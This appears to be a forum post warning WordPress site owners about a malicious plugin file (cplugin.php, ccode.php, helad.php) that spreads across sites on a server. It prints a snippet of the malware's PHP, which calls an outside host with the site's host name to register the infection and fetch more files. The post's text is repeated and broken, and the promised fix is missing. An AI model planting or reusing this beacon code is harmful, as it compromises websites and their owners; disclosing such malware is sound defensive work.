There is a recent attack where numerous wordpress websites are taken down due to a file
which is a malware.
The malware is bad written code so for now it is mostly causing 500 server runtime error. But its better to delete it immediately as it migrate to all multiple website on the server and has code to hit a malware url to download additional files. A snippet of the malware code:
I have figured out a solution and posting the answer myself to help all users out there.
Edit:
There are reports of the same file being named differently for users:
and
in which case the fix can be modified.
Code:
cplugin.phpThe malware is bad written code so for now it is mostly causing 500 server runtime error. But its better to delete it immediately as it migrate to all multiple website on the server and has code to hit a malware url to download additional files. A snippet of the malware code:
Code:
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}Edit:
There are reports of the same file being named differently for users:
Code:
ccode.php, cplugin.php
Code:
helad.php